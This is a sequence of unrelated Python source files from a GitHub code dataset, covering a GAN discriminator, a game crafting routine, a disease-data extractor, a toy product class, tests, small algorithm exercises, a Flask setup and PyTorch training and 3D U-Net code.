NLayerDiscriminator(nn.Module):\n \"\"\"https://github.com/CDOTAD/AlphaGAN-Matting/blob/fa0f4ee3515ed49a10faf10e252d29e8055b8769/\n model/NLayerDiscriminator.py#L7\n \"\"\"\n\n def __init__(\n self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False\n ):\n super().__init__()\n if isinstance(norm_layer, functools.partial):\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kernel = 4\n padw = 1\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kernel, stride=2, padding=padw),\n nn.LeakyReLU(0.2),\n ]\n nf_mult = 1\n nf_mult_prev = 1\n for layer_index in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** layer_index, 8)\n sequence += [\n nn.Conv2d(\n ndf * nf_mult_prev,\n ndf * nf_mult,\n kernel_size=kernel,\n stride=2,\n padding=padw,\n bias=use_bias,\n ),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2),\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(\n ndf * nf_mult_prev,\n ndf * nf_mult,\n kernel_size=kernel,\n stride=1,\n padding=padw,\n bias=use_bias,\n ),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2),\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kernel, stride=1, padding=padw)\n ]\n\n if use_sigmoid:\n sequence += [nn.Sigmoid()]\n\n self.model = nn.Sequential(*sequence)\n self._initialize_weights()\n\n def _initialize_weights(self):\n for module in self.modules():\n if isinstance(module, nn.Conv2d):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n nn.init.constant_(module.bias, 0)\n elif isinstance(module, nn.BatchNorm2d):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n \"\"\"forward pass for the neural network\"\"\"\n return self.model(inputs)\n\n\nif __name__ == \"__main__\":\n Disc = NLayerDiscriminator(input_nc=4, n_layers=4, 
norm_layer=nn.BatchNorm2d)\n","repo_name":"Anuj040/matte","sub_path":"src/model/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72203834176","text":"import time\n\n\ndef craft_item(inventory, recipes, needed_time_per_item):\n item_to_craft, count = input(\"What do you want to craft?: (steel*1)\").split(\"*\")\n all_craftable_things = {}\n ressources_for_crafting = {}\n # get all craftable items in a dictonary -> key = repair tool -- value = tool\n for item in recipes.keys():\n all_craftable_things[item.split(\"|\")[0]] = item.split(\"|\")[1]\n # get recipe for user's item\n recipe = recipes.get(item_to_craft + \"|\" + all_craftable_things.get(item_to_craft))\n # save all ressources for crafting in a list\n if item_to_craft in all_craftable_things.keys():\n for item in recipe:\n ressources_for_crafting[item.split(\"*\")[0]] = float(item.split(\"*\")[1]) * int(count)\n print(ressources_for_crafting)\n # check if user has all items he needs\n new_inv = delete_items_from_inventory(inventory=inventory[\"items\"], inventory_to_delete=ressources_for_crafting)\n if not new_inv[0]:\n # returns exeption to user\n return new_inv[1], False\n else:\n # wait until crafting time is over\n print(f\"crafting... Needed time: {needed_time_per_item * float(count)}\")\n time.sleep(needed_time_per_item * float(count))\n # delete ressources from inventory\n inventory[\"items\"] = new_inv[1]\n # append new item to inventory\n if all_craftable_things.get(item_to_craft) == \"tools\":\n # count becomes durability\n count = 100\n # check if user already has the crafted item in the inventory\n if item_to_craft in inventory[all_craftable_things.get(item_to_craft)]:\n inventory[all_craftable_things.get(item_to_craft)][item_to_craft] += float(count)\n else:\n inventory[all_craftable_things.get(item_to_craft)][item_to_craft] = float(count)\n return inventory, True\n else:\n return \"The item doesn't exists!\", False\n\n\ndef delete_items_from_inventory(inventory, inventory_to_delete):\n # loops through each item for the ressources in the recipe\n for item, count in inventory_to_delete.items():\n # checks if user has the item\n if item in inventory.keys():\n # checks if user has the count of the items\n if float(inventory.get(item)) >= float(count):\n if float(inventory.get(item)) == float(count):\n # delete item from inv\n inventory.pop(item)\n else:\n inventory[item] -= count\n else:\n return False, f\"You don't have {count} of {item}. 
You only have {inventory.get(item)}\"\n else:\n return False, f\"You don't have the item {item} in you're inventory, which you need\"\n\n return True, inventory\n\n\n### EXAMPLE USAGE ####\nexample = False\nif example:\n recipes = {\n \"steel|items\": [\"iron*1\", \"match*1\"],\n \"match|items\": [\"stick*1\", \"coal*0.25\"],\n \"stick|items\": [\"wood*1\"],\n \"engine|items\": [\"steel*10\", \"copper wire*5\", \"fuel tank*1\", \"spark plug*1\"],\n \"spark plug|items\": [\"cooper*5\", \"nickel*2\", \"insulator*1\"],\n \"insulator|items\": [\"rubber*5\", \"glass*2\"],\n \"glass|items\": [\"sand*1\", \"match*1\"],\n \"cooper wire|items\": [\"cooper*2\"],\n \"fuel tank|items\": [\"rubber*2\", \"steel*5\"],\n \"repair kit|tools\": [\"insulator*1\", \"nickel*1\"]\n }\n inventory = {\"tools\": {\"pickaxe\": 100.0, \"wrench\": 100, \"shovel\": 92.5, \"axe\": 95.0},\n \"items\": {\"stone\": 4.0, \"stick\": 2.0, \"rubber\": 10, \"iron\": 9.0, \"match\": 3, \"sand\": 15, \"coal\": 50,\n \"insulator\": 1, \"nickel\": 23, \"steel\": 2}}\n needed_time = 0.25\n craft_itemm = craft_item(inventory, recipes, needed_time)\n if craft_itemm[1]:\n inventory = craft_itemm[0]\n else:\n print(craft_itemm[0])\n print(inventory)\n","repo_name":"BennoCrafter/ItemManufactory","sub_path":"commands/craft_item.py","file_name":"craft_item.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17617245247","text":"import uuid\n\n\ndef get_disease_record(diseaseRecord, dataProvider, dateProduced, release, allelicGeneId):\n\n fishEnvId = None\n conditions = None\n qualifier = None\n publicationModId = None\n pubMedId = None\n\n diseaseObjectType = diseaseRecord['objectRelation'].get(\"objectType\")\n\n primaryId = diseaseRecord.get('objectId')\n\n if 'qualifier' in diseaseRecord:\n qualifier = diseaseRecord.get('qualifier')\n if qualifier is None:\n if 'evidence' in diseaseRecord:\n\n publicationModId = \"\"\n pubMedId = \"\"\n pubModUrl = None\n pubMedUrl = None\n diseaseAssociationType = None\n ecodes = []\n\n evidence = diseaseRecord.get('evidence')\n if 'publication' in evidence:\n if 'modPublicationId' in evidence['publication']:\n publicationModId = evidence['publication'].get('modPublicationId')\n localPubModId = publicationModId.split(\":\")[1]\n pubModUrl = get_complete_pub_url(localPubModId, publicationModId)\n if 'pubMedId' in evidence['publication']:\n pubMedId = evidence['publication'].get('pubMedId')\n localPubMedId = pubMedId.split(\":\")[1]\n pubMedUrl = get_complete_pub_url(localPubMedId, pubMedId)\n\n if 'objectRelation' in diseaseRecord:\n diseaseAssociationType = diseaseRecord['objectRelation'].get(\"associationType\")\n\n additionalGeneticComponents = []\n if 'additionalGeneticComponents' in diseaseRecord['objectRelation']:\n for component in diseaseRecord['objectRelation']['additionalGeneticComponents']:\n componentSymbol = component.get('componentSymbol')\n componentId = component.get('componentId')\n componentUrl = component.get('componentUrl') + componentId\n additionalGeneticComponents.append(\n {\"id\": componentId, \"componentUrl\": componentUrl, \"componentSymbol\": componentSymbol}\n )\n\n if 'evidenceCodes' in diseaseRecord['evidence']:\n ecodes = diseaseRecord['evidence'].get('evidenceCodes')\n\n if 'experimentalConditions' in diseaseRecord:\n conditionId = \"\"\n for condition in diseaseRecord['experimentalConditions']:\n if 'textCondition' in condition:\n if dataProvider == 'ZFIN':\n 
conditionId = conditionId + condition.get('textCondition')\n # if condition != None:\n conditions = diseaseRecord.get('experimentalConditions')\n if dataProvider == 'ZFIN':\n fishEnvId = primaryId + conditionId\n\n # TODO: get SGD to fix their disease file.\n if diseaseRecord.get('taxonId') == 'taxon:559292':\n taxonId = \"NCBITaxon:559292\"\n else:\n taxonId = diseaseRecord.get('taxonId')\n\n disease_feature = {\n \"primaryId\": primaryId,\n \"diseaseObjectName\": diseaseRecord.get('objectName'),\n \"diseaseObjectType\": diseaseObjectType,\n \"taxonId\": taxonId,\n \"diseaseAssociationType\": diseaseRecord['objectRelation'].get(\"associationType\"),\n \"with\": diseaseRecord.get('with'),\n \"doId\": diseaseRecord.get('DOid'),\n \"pubMedId\": pubMedId,\n \"pubMedUrl\": pubMedUrl,\n \"pubModId\": publicationModId,\n \"pubModUrl\": pubModUrl,\n \"pubPrimaryKey\": pubMedId + publicationModId,\n \"release\": release,\n \"dataProvider\": dataProvider,\n \"relationshipType\": diseaseAssociationType,\n \"dateProduced\": dateProduced,\n \"qualifier\": qualifier,\n \"doDisplayId\": diseaseRecord.get('DOid'),\n \"doUrl\": \"http://www.disease-ontology.org/?id=\" + diseaseRecord.get('DOid'),\n \"doPrefix\": \"DOID\",\n # doing the typing in neo, but this is for backwards compatibility in ES\n \"ecodes\": ecodes,\n \"definition\": diseaseRecord.get('definition'),\n \"inferredGene\": diseaseRecord.get('objectRelation').get('inferredGeneAssociation'),\n \"experimentalConditions\": conditions,\n \"fishEnvId\": fishEnvId,\n \"additionalGeneticComponents\": additionalGeneticComponents,\n \"uuid\": str(uuid.uuid4()),\n \"loadKey\": dataProvider + \"_\" + dateProduced + \"_Disease\",\n \"allelicGeneId\": allelicGeneId\n }\n return disease_feature\n\n\ndef get_complete_pub_url(local_id, global_id):\n complete_url = None\n\n if 'MGI' in global_id:\n complete_url = 'http://www.informatics.jax.org/accession/' + global_id\n if 'RGD' in global_id:\n complete_url = 'http://rgd.mcw.edu/rgdweb/search/search.html?term=' + local_id\n if 'SGD' in global_id:\n complete_url = 'http://www.yeastgenome.org/reference/' + local_id\n if 'FB' in global_id:\n complete_url = 'http://flybase.org/reports/' + local_id + '.html'\n if 'ZFIN' in global_id:\n complete_url = 'http://zfin.org/' + local_id\n if 'WB:' in global_id:\n complete_url = 'http://www.wormbase.org/db/misc/paper?name=' + local_id\n if 'PMID:' in global_id:\n complete_url = 'https://www.ncbi.nlm.nih.gov/pubmed/' + local_id\n\n return complete_url\n","repo_name":"yeastgenome/AGR_POC","sub_path":"LOADER/agr_loader-develop/src/extractors/disease_ext.py","file_name":"disease_ext.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42033062604","text":"# modules/product.py\nimport random\n\n\nclass Product:\n '''\n\n '''\n def __init__(self, name, price = 10, weight = 20, flammability = 0.5,\n identifier = random.randint(1000000, 9999999)):\n self.name = name\n self.price = price\n self.weight = weight\n self.flammability = flammability\n self.identifier = identifier\n\n def stealability(self):\n stealable = self.price / self.weight\n\n if stealable < 0.5:\n print(\"Not so stealable\")\n elif stealable >= 0.5 and stealable < 1.0:\n print(\"Kinda stealable\")\n else:\n print(\"Very stealable\")\n\n def explode(self):\n explodable = self.flammability * self.weight\n\n if explodable < 10:\n print(\"...fizzle.\")\n elif explodable >= 10 and explodable < 50:\n 
print(\"...boom!\")\n else:\n print(\"...BABOOM!!\")\n\nclass BoxingGlove(Product):\n def __int__(self, name, price = 10, weight = 10, flammability = 0.5,\n identifier = random.randint(1000000, 9999999)):\n super().__init__(name=name, price=price, weight=weight,\n flammability=flammability, identifier=identifier)\n\n\n\n def explode(self):\n print(\"...it's a glove.\")\n\n def punch(self):\n weight_glove = self.weight\n\n if weight_glove < 5:\n print(\"That tickles.\")\n elif weight_glove >=5 and weight_glove < 15:\n print(\"Hey that hurt!\")\n else:\n print(\"OUCH!\")\n","repo_name":"nimu77/sprint_challenge","sub_path":"modules/acme.py","file_name":"acme.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"8484238025","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\"\"\"MDDatePicker Test.\"\"\"\n\nfrom datetime import datetime\nfrom django import setup\nfrom django.test import TestCase\nfrom djextra.forms.angular1.widgets import MDDatePicker\n\n\nsetup()\n\n\nclass SimpleMDDatePickerTest(TestCase):\n \"\"\"Simple MDDatePicker test.\"\"\"\n\n def setUp(self):\n \"\"\"Setup.\"\"\"\n self.widget = MDDatePicker()\n\n def test_render(self):\n \"\"\"The generated content should be correct.\"\"\"\n result = str(self.widget.render(\"result\", None)).replace(\"\\n\", \"\")\n data = (\n \"\"\n \"\"\n )\n self.assertEqual(result, data)\n\n def test_render_has_value(self):\n \"\"\"The generated content should be correct.\"\"\"\n now = datetime.utcnow().isoformat()\n result = str(self.widget.render(\"result\", now)).replace(\"\\n\", \"\")\n data = (\n f\"\"\n \"\"\n )\n self.assertEqual(result, data)\n","repo_name":"hiroaki-yamamoto/djextra","sub_path":"tests/angular1/widgets/test_md_datepicker.py","file_name":"test_md_datepicker.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"32177550894","text":"import sys\n\nN = int(sys.stdin.readline())\ncircles = []\n\nfor _ in range(N):\n x, r = map(int, sys.stdin.readline().split())\n circles.append([(x - r), 'L'])\n circles.append([(x + r), 'R'])\n\ncircles.sort(key=lambda x : (-x[0], x[1]), reverse=True)\n\nstack = []\nans = 1 # 기본 1개\n\nfor cir in circles:\n if cir[1] == 'L':\n stack.append(cir)\n else:\n total_len = 0\n while stack and stack[-1][1] != 'L':\n total_len += stack.pop()[0]\n\n if total_len == cir[0] - stack[-1][0]:\n ans += 2\n else:\n ans += 1\n stack.append([cir[0] - stack.pop()[0], 'C'])\n\nprint(ans)","repo_name":"fredkeemhaus/TIL","sub_path":"backjoon/10000/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"16975357453","text":"#1 gcd\n#Euclidean Algorithm\ndef gcd(a, b):\n if b == 0:\n return a\n else:\n return gcd(b, a % b)\n\nprint(gcd(1071,462))\n\n\n#pascal triangle:\ndef pastri(x: int): #x is the number of rows\n ele = lambda a, b: 1 if b in (0, a) else ele(a - 1, b - 1) + ele(a - 1, b)\n #ele is a lambda func to find the b-th element of row a\n lastlst = []\n for k in range(x + 1):\n lastlst.append(str(ele(x, k)))\n a = ' '.join(lastlst)\n #get the last row for displaying purpose\n for i in range(x):\n lst = []\n for k in range(i +1):\n lst.append(str(ele(i, k)))\n #convert ele from int to str to use join and center\n print(' '.join(lst).center(len(a)))\n 
print()\n\npastri(6)\n","repo_name":"doandanhtu/pythonbasic","sub_path":"Function/recursionHW.py","file_name":"recursionHW.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42434811411","text":"import pandas as pd\nimport numpy as np\nimport pickle\n\n\n# 保存每个用户的相似用户数\nnumber_similar_item = 20\n\nftest = open('D:\\\\CCIR2018\\\\itemCF\\\\user_answer_train.txt', 'rb') # 直接在user_answer_train.txt中建立答案相似性\nuser_answer_train = pickle.load(ftest)\nftrain = open('D:\\\\CCIR2018\\\\itemCF\\\\answer_user_train.txt', 'rb')\nanswer_user_train = pickle.load(ftrain)\n\nftest.close()\nftrain.close()\n\n\nprint(len(user_answer_train))\n\nimport math\nimport time\n# 用字典保存相似答案\nsimilarity = {}\nfor user, answers in user_answer_train.items():\n start = time.clock()\n list1 = list(answers.keys())\n len1 = len(list1)\n for i in range(0, len1):\n for j in range(i+1, len1):\n # print(type(list1))\n a = list1[i]\n b = list1[j]\n if a < b:\n similarity.setdefault(list1[i], {})\n similarity[list1[i]].setdefault(list1[j], 0)\n similarity[list1[i]][list1[j]] += 1\n else:\n similarity.setdefault(list1[j], {})\n similarity[list1[j]].setdefault(list1[i], 0)\n similarity[list1[j]][list1[i]] += 1\n print(time.clock() - start)\n\nfor answer1, related_answers in similarity.items():\n for answer2, count in related_answers.items():\n similarity[answer1][answer2] = count/math.sqrt(len(answer_user_train[answer1])*len(answer_user_train[answer2]))\n\n\n\nf = open('D:\\\\CCIR2018\\\\itemCF\\\\item_similarity_matrix.txt', 'wb')\npickle.dump(similarity, f)\nf.close()\n\n\nprint(len(similarity))\nprint(\"相似答案已生成!!!\")\n\n","repo_name":"littleluck/CCIR-2018","sub_path":"itemCF/item_similarity2.py","file_name":"item_similarity2.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"4838368043","text":"from flask import Flask, render_template\nfrom flask_sqlalchemy import SQLAlchemy\nfrom os.path import exists\nfrom flask_login import LoginManager\n\ndb = SQLAlchemy()\napp = Flask(__name__)\n\ndef index():\n app.config[\"SECRET_KEY\"] = \"5fsyuadigohkfg\\g54d1fsggrteG45wtref4ad567f89gohp[\"\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///database.db\"\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = True\n db.init_app(app)\n from .routes import routes\n from .auth import auth\n app.register_blueprint(routes, url_prefix=\"/\")\n app.register_blueprint(auth, url_prefix=\"/\")\n from .models import UserData, UserPosts\n createDataBase(app)\n login_manager = LoginManager()\n login_manager.login_view = \"auth.login\"\n login_manager.init_app(app)\n\n @login_manager.user_loader\n def load_user(id):\n return UserData.query.get(int(id))\n\n return app\n\ndef createDataBase(app):\n if not exists(\"website/database.db\"):\n db.create_all(app=app)\n","repo_name":"Yash2003Bisht/BlogAppUsingFlask","sub_path":"website/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"74756048894","text":"import datetime\n\nfrom nazgul.action import DriverAction\nfrom nazgul.constants import CHECKIN, CHECKOUT\nfrom nazgul.models.datastore import list_objects, create\n\n\nclass Action(DriverAction):\n action_name = \"Registrar entradas y salidas\"\n\n message = None\n\n triggers = ['r', 'registrar', \"hola\", 
\"hola!\", \"adios\", \"adios!\"]\n\n @property\n def help(self):\n return \"teclea 'r', 'R' o 'registrar' para registrar entrada y salida automáticamente\"\n\n def response(self):\n results = list_objects(user=self.message.user_id)\n if len(results) > 0 and results[0][\"type\"] == CHECKIN:\n type_record = CHECKOUT\n message_1 = \"Hasta luego\"\n message_2 = \"Salida registrada\"\n else:\n message_1 = \"Buenas\"\n type_record = CHECKIN\n message_2 = \"Entrada registrada\"\n\n create({\"user\": self.message.user_id, \"username\": self.message.user, \"type\": type_record,\n \"timestamp\": datetime.datetime.now()})\n return '{}. {}'.format(message_1, message_2)\n","repo_name":"avara1986/nazgul","sub_path":"nazgul/actions/a0010_record_time/a0010_record_time.py","file_name":"a0010_record_time.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"1368257207","text":"import sys\nfrom timeit import default_timer as timer\n\nimport torch\nfrom torch.utils.data import Dataset\nimport numpy as np\n\n\nclass ImageCaptionDataset(Dataset):\n def __init__(self, pairs_dataset, cap_encodings):\n super(ImageCaptionDataset, self).__init__()\n self.pairs_dataset = pairs_dataset\n self.cap_encodings = cap_encodings\n\n def __len__(self):\n return len(self.pairs_dataset)\n\n def __getitem__(self, i):\n anchor, _ = self.pairs_dataset[i]\n # pos_enc = self.cap_encodings[i][random.randint(0, len(self.cap_encodings[i])-1)]\n pos_enc = self.cap_encodings[i][0]\n\n return anchor, pos_enc\n\n\ndef train_for_classification(net, train_loader, test_loader, optimizer, \n criterion, lr_scheduler=None,\n epochs=1, reports_every=1, device='cuda'):\n net.to(device)\n total_train = len(train_loader.dataset)\n total_test = len(test_loader.dataset)\n tiempo_epochs = 0\n train_loss, train_acc, test_acc = [], [], []\n\n for e in range(1,epochs+1): \n inicio_epoch = timer()\n \n # Aseguramos que todos los parámetros se entrenarán usando .train()\n net.train()\n\n # Variables para las métricas\n running_loss, running_acc = 0.0, 0.0\n\n for i, data in enumerate(train_loader):\n # Desagregamos los datos y los pasamos a la GPU\n X, Y = data\n X, Y = X.to(device), Y.to(device)\n\n # Limpiamos los gradientes, pasamos el input por la red, calculamos\n # la loss, ejecutamos el backpropagation (.backward) \n # y un paso del optimizador para modificar los parámetros\n optimizer.zero_grad()\n\n out_dict = net(X)\n Y_logits = out_dict['logits']\n loss = criterion(Y_logits, Y)\n\n # Si hay logits auxiliares considéralos en la loss promediando\n # loss calculada para cada logit (incluyendo el anterior ya calculado)\n if 'aux_logits' in out_dict:\n aux_logits_list = out_dict['aux_logits']\n N = len(aux_logits_list)\n for aux_logits in aux_logits_list:\n loss += criterion(aux_logits, Y)\n loss /= (N + 1)\n\n \n loss.backward()\n optimizer.step()\n\n # loss\n items = min(total_train, (i+1) * train_loader.batch_size)\n running_loss += loss.item()\n avg_loss = running_loss/(i+1)\n \n # accuracy\n _, max_idx = torch.max(Y_logits, dim=1)\n running_acc += torch.sum(max_idx == Y).item()\n avg_acc = running_acc/items*100\n\n # report\n sys.stdout.write(f'\\rEpoch:{e}({items}/{total_train}), ' \n + (f'lr:{lr_scheduler.get_last_lr()[0]:02.7f}, ' if lr_scheduler is not None else '')\n + f'Loss:{avg_loss:02.5f}, '\n + f'Train Acc:{avg_acc:02.1f}%')\n \n tiempo_epochs += timer() - inicio_epoch\n\n if e % reports_every == 0:\n sys.stdout.write(', 
Validating...')\n train_loss.append(avg_loss)\n train_acc.append(avg_acc)\n net.eval()\n running_acc = 0.0\n for i, data in enumerate(test_loader):\n X, Y = data\n X, Y = X.to(device), Y.to(device)\n Y_logits = net(X)['logits']\n _, max_idx = torch.max(Y_logits, dim=1)\n running_acc += torch.sum(max_idx == Y).item()\n avg_acc = running_acc/total_test*100\n test_acc.append(avg_acc)\n sys.stdout.write(f', Val Acc:{avg_acc:02.2f}%, '\n + f'Avg-Time:{tiempo_epochs/e:.3f}s.\\n')\n else:\n sys.stdout.write('\\n')\n\n if lr_scheduler is not None:\n lr_scheduler.step()\n\n return train_loss, (train_acc, test_acc)\n \ndef l2norm(x):\n norm = np.linalg.norm(x, axis=1, keepdims=True)\n return 1.0 * x / norm\n\n\ndef compute_ranks_x2y(x, y):\n dists = torch.cdist(x.unsqueeze(0), y.unsqueeze(0), p=2).squeeze(0)\n ranks = torch.zeros(dists.shape[0])\n for i in range(len(ranks)):\n d_i = dists[i,:]\n inds = torch.argsort(d_i)\n rank = torch.where(inds == i)[0][0]\n ranks[i] = rank\n return ranks\n\n\ndef train_for_retrieval(img_net, text_net, train_loader, test_loader, optimizer, \n criterion, lr_scheduler=None, epochs=1, reports_every=1, \n device='cuda', norm=True):\n img_net.to(device)\n text_net.to(device)\n\n total_train = len(train_loader.dataset)\n total_test = len(test_loader.dataset)\n tiempo_epochs = 0\n train_loss, train_meanrr, test_meanrr, train_r10, test_r10 = [], [], [], [], []\n\n for e in range(1,epochs+1):\n inicio_epoch = timer()\n\n # Aseguramos que todos los parámetros se entrenarán usando .train()\n img_net.train()\n text_net.train()\n\n # Variables para las métricas\n running_loss, running_meanrr, running_r10 = 0.0, 0.0, 0.0\n\n for i, data in enumerate(train_loader):\n # Desagregamos los datos y los pasamos a la GPU\n a, p = data\n if norm:\n a, p = l2norm(a), l2norm(p)\n a, p = a.to(device), p.to(device)\n\n # Limpiamos los gradientes, pasamos el input por la red, calculamos\n # la loss, ejecutamos el backpropagation (.backward) \n # y un paso del optimizador para modificar los parámetros\n optimizer.zero_grad()\n\n a_enc = img_net(a)['logits']\n p_enc = text_net(p)['logits']\n\n loss = criterion(a_enc, p_enc)\n loss.backward()\n optimizer.step()\n\n # loss\n items = min(total_train, (i+1) * train_loader.batch_size)\n running_loss += loss.item()\n avg_loss = running_loss/(i+1)\n\n # mean-rank\n ranks = compute_ranks_x2y(a_enc, p_enc)\n # running_meanr += (ranks.mean()/len(a))\n running_meanrr += (torch.reciprocal(ranks+1).mean())\n avg_meanrr = running_meanrr/(i+1)\n\n # recall at 10\n r10 = 100.0 * len(torch.where(ranks < 10)[0]) / len(ranks)\n running_r10 += r10\n avg_r10 = running_r10/(i+1)\n\n # report\n sys.stdout.write(f'\\rEpoch:{e}({items}/{total_train}), '\n + (f'lr:{lr_scheduler.get_last_lr()[0]:02.7f}, ' if lr_scheduler is not None else '')\n + f'Loss:{avg_loss:02.5f}, '\n + f'Train MRR:{avg_meanrr:02.2f} '\n + f'R@10:{avg_r10:02.2f}%')\n \n tiempo_epochs += timer() - inicio_epoch\n\n if e % reports_every == 0:\n sys.stdout.write(', Validating...')\n train_loss.append(avg_loss)\n train_meanrr.append(avg_meanrr)\n train_r10.append(avg_r10)\n\n img_net.eval()\n text_net.eval()\n\n running_meanrr, running_r10 = 0.0, 0.0\n for i, data in enumerate(test_loader):\n a, p = data\n a, p = a.to(device), p.to(device)\n\n a_enc = img_net(a)['logits']\n p_enc = text_net(p)['logits']\n\n # mean-rank\n ranks = compute_ranks_x2y(a_enc, p_enc)\n # running_meanrr += (ranks.mean()/len(a))\n running_meanrr += (torch.reciprocal(ranks+1).mean())\n\n # recall at 10\n r10 = 100.0 * 
len(torch.where(ranks < 10)[0]) / len(ranks)\n running_r10 += r10\n\n avg_meanrr = running_meanrr/len(test_loader)\n avg_r10 = running_r10/len(test_loader)\n\n test_meanrr.append(avg_meanrr)\n test_r10.append(avg_r10)\n sys.stdout.write(f'MRR:{avg_meanrr:02.2f} '\n + f'R@10:{avg_r10:02.2f}% '\n + f'Avg-Time:{tiempo_epochs/e:.3f}s.\\n')\n else:\n sys.stdout.write('\\n')\n\n if lr_scheduler is not None:\n lr_scheduler.step()\n\n return train_loss, (train_meanrr, test_meanrr), (train_r10, test_r10)\n","repo_name":"dccuchile/CC6204","sub_path":"2020/tareas/tarea4/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7403,"program_lang":"python","lang":"en","doc_type":"code","stars":170,"dataset":"github-code","pt":"79"} +{"seq_id":"27148523262","text":"from keras import layers, models,Model\nfrom keras import backend as K\nfrom keras.initializers import RandomNormal,Constant\nfrom keras.layers import Conv3D,Reshape,Add,LeakyReLU,Multiply,Lambda,GlobalAveragePooling3D,Average,Dense,multiply,Maximum,Subtract,UpSampling3D,AveragePooling3D,concatenate,Permute,Input,BatchNormalization,add,Conv3DTranspose,Activation,MaxPooling3D,Dropout\nK.set_image_data_format('channels_last')\nimport tensorflow as tf\nfrom attention import PAM\ndef BatchActivate(x):\n x = BatchNormalization()(x)\n# x = Activation('relu')(x)\n x = LeakyReLU(0.2)(x)\n return x\n\ndef res_block(x, nb_filters, strides):\n\tres_path = BatchActivate(x)\n\tres_path = Conv3D(filters=nb_filters[0], kernel_size=(3, 3, 3), padding='same', strides=strides[0], kernel_initializer='he_normal')(res_path)\n\tres_path = BatchActivate(res_path)\n\tres_path = Conv3D(filters=nb_filters[1], kernel_size=(3, 3 ,3), padding='same', strides=strides[1],kernel_initializer='he_normal')(res_path)\n\n\tshortcut = Conv3D(nb_filters[1], kernel_size=(1, 1, 1), strides=strides[0],kernel_initializer='he_normal')(x)\n\n\tres_path = add([shortcut, res_path])\n\treturn res_path\n\n\ndef encoder(x):\n to_decoder = []\n\n main_path = Conv3D(filters=16, kernel_size=(3, 3, 3), padding='same', strides=(1, 1, 1),kernel_initializer='he_normal')(x)\n main_path = BatchActivate(main_path)\n\n main_path = Conv3D(filters=16, kernel_size=(3, 3, 3), padding='same', strides=(1, 1, 1),kernel_initializer='he_normal')(main_path)\n\n shortcut = Conv3D(filters=16, kernel_size=(1, 1, 1), strides=(1, 1, 1),kernel_initializer='he_normal')(x)\n\n main_path = add([shortcut, main_path])\n # first branching to decoder\n to_decoder.append(main_path)\n\n main_path = res_block(main_path, [32, 32], [(2, 2,2), (1,1, 1)])\n to_decoder.append(main_path)\n\n main_path = res_block(main_path, [64, 64], [(2, 2,2), (1, 1,1)])\n to_decoder.append(main_path)\n\n\n main_path = res_block(main_path, [128, 128], [(2, 2, 2), (1, 1, 1)])\n to_decoder.append(main_path)\n\n return to_decoder\n\n\n\n\n\n\ndef decoder(x, from_encoder,from_encoderF):\n main_path = UpSampling3D(size=(2, 2, 2))(x)\n main_path = concatenate([main_path, from_encoderF[3],from_encoder[3]], axis=-1)\n main_path = res_block(main_path, [128, 128], [(1, 1,1), (1,1, 1)])\n\n main_path = UpSampling3D(size=(2, 2, 2))(main_path)\n main_path = concatenate([main_path, from_encoderF[2],from_encoder[2]], axis=-1)\n main_path = res_block(main_path, [64, 64], [(1, 1,1), (1, 1,1)])\n\n main_path = UpSampling3D(size=(2, 2, 2))(main_path)\n main_path = concatenate([main_path, from_encoderF[1],from_encoder[1]], axis=-1)\n main_path = res_block(main_path, [32, 32], [(1, 1,1), (1, 1,1)])\n\n\n main_path = UpSampling3D(size=(2, 2, 2))(main_path)\n 
